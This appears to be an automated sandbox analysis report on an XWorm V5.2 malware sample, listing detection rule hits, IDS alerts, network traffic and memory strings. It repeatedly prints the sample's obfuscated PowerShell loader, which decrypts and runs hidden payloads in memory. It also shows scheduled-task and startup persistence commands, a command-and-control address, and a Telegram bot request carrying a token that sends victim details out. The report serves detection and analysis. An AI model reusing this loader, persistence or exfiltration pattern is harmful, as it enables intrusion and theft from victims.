        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\e45iasd.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5264, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e45iasd
        Source: Process startedAuthor: Hieu Tran: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose();
        Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\e45iasd.exe, ProcessId: 1528, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uuzvzant.zph.ps1
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7900, TargetFilename: C:\Users\user\AppData\Roaming\startup_str_616.vbs
        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5264, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e45iasd.lnk
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "e45iasd" /tr "C:\Users\user\AppData\Local\Temp\e45iasd.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "e45iasd" /tr "C:\Users\user\AppData\Local\Temp\e45iasd.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\AppData\Roaming\startup_str_616.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5264, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "e45iasd" /tr "C:\Users\user\AppData\Local\Temp\e45iasd.exe", ProcessId: 7812, ProcessName: schtasks.exe
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_616.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_616.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\startup_str_616.vbs" , ProcessId: 7336, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose();
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose();
        Timestamp:2024-08-22T13:12:35.763456+0200
        SID:2855924
        Severity:1
        Source Port:49723
        Destination Port:2404
        Protocol:TCP
        Classtype:Malware Command and Control Activity Detected
        Timestamp:2024-08-22T13:11:23.227185+0200
        SID:2853685
        Severity:1
        Source Port:49717
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: C:\Users\user\AppData\Roaming\startup_str_616.vbsAvira: detection malicious, Label: VBS/Runner.VPXO
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49717 version: TLS 1.2
        Source: Binary string: powershell.pdbUGP source: e45iasd.exe, 00000016.00000000.1556727375.00007FF6D073A000.00000002.00000001.01000000.0000000A.sdmp, e45iasd.exe.16.dr
        Source: Binary string: powershell.pdb source: e45iasd.exe, 00000016.00000000.1556727375.00007FF6D073A000.00000002.00000001.01000000.0000000A.sdmp, e45iasd.exe.16.dr

        Software Vulnerabilities

        barindex
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:49723 -> 95.98.144.201:2404
        Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.9:49717 -> 149.154.167.220:443
        Source: unknownDNS query: name: api.telegram.org
        Source: global trafficTCP traffic: 192.168.2.9:49718 -> 95.98.144.201:2404
        Source: global trafficHTTP traffic detected: GET /bot6421494903:AAFuoWigwh2-oDYMZFAWqzFsbHJABidzW1Q/sendMessage?chat_id=6421494903:AAFuoWigwh2-oDYMZFAWqzFsbHJABidzW1Q&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A34B1CC6324AA14E91F87%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20NW4C52%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
        Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
        Source: Joe Sandbox ViewASN Name: TMO-NL-ASNL TMO-NL-ASNL
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownTCP traffic detected without corresponding DNS query: 95.98.144.201
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /bot6421494903:AAFuoWigwh2-oDYMZFAWqzFsbHJABidzW1Q/sendMessage?chat_id=6421494903:AAFuoWigwh2-oDYMZFAWqzFsbHJABidzW1Q&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A34B1CC6324AA14E91F87%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20NW4C52%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: api.telegram.org
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.18.0Date: Thu, 22 Aug 2024 11:11:23 GMTContent-Type: application/jsonContent-Length: 89Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
        Source: powershell.exe, 00000005.00000002.1520433343.00000263B3CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1424079642.0000027568306000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000016.00000002.2598736116.000001802B5F4000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000016.00000002.2969443709.000001803B2A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: e45iasd.exe, 00000016.00000002.2598736116.000001802B4F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000008.00000002.1404589530.00000275584BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000005.00000002.1465156371.00000263A3AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1404589530.0000027558291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2604118350.00000121C5B21000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000016.00000002.2598736116.000001802B211000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000018.00000002.2600358966.000002A363BE4000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 0000001A.00000002.2599686863.000001EB32F23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000008.00000002.1404589530.00000275584BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: e45iasd.exe, 00000016.00000002.2598736116.000001802CBF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: e45iasd.exe, 00000016.00000002.2598736116.000001802B4F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000008.00000002.1430188190.00000275708B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
        Source: e45iasd.exe, 0000001A.00000002.2597249004.000001EB310F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
        Source: powershell.exe, 00000005.00000002.1465156371.00000263A3AC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1404589530.0000027558291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2604118350.00000121C5B21000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000016.00000002.2598736116.000001802B211000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000018.00000002.2600358966.000002A363BAF000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000018.00000002.2600358966.000002A363BBD000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 0000001A.00000002.2599686863.000001EB32F23000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 0000001A.00000002.2599686863.000001EB32F3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000008.00000002.1404589530.00000275584BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
        Source: powershell.exe, 00000010.00000002.2604118350.00000121C6418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
        Source: e45iasd.exe, 00000016.00000002.2598736116.000001802B4F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: e45iasd.exe, 00000016.00000002.2598736116.000001802B4F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: e45iasd.exe, 00000016.00000002.2598736116.000001802B4F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: e45iasd.exe, 00000016.00000002.2598736116.000001802B4F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: e45iasd.exe, 00000016.00000002.2598736116.000001802C14F000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000018.00000002.2600358966.000002A36443A000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 0000001A.00000002.2599686863.000001EB33751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000005.00000002.1520433343.00000263B3CDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1424079642.0000027568306000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000016.00000002.2598736116.000001802CF12000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000016.00000002.2969443709.000001803B2A0000.00000004.00000800.00020000.00000000.sdmp, e45iasd.exe, 00000016.00000002.2598736116.000001802B4F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: e45iasd.exe, 00000016.00000002.2598736116.000001802CBF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
        Source: e45iasd.exe, 00000016.00000002.2598736116.000001802CBF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49717 version: TLS 1.2

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
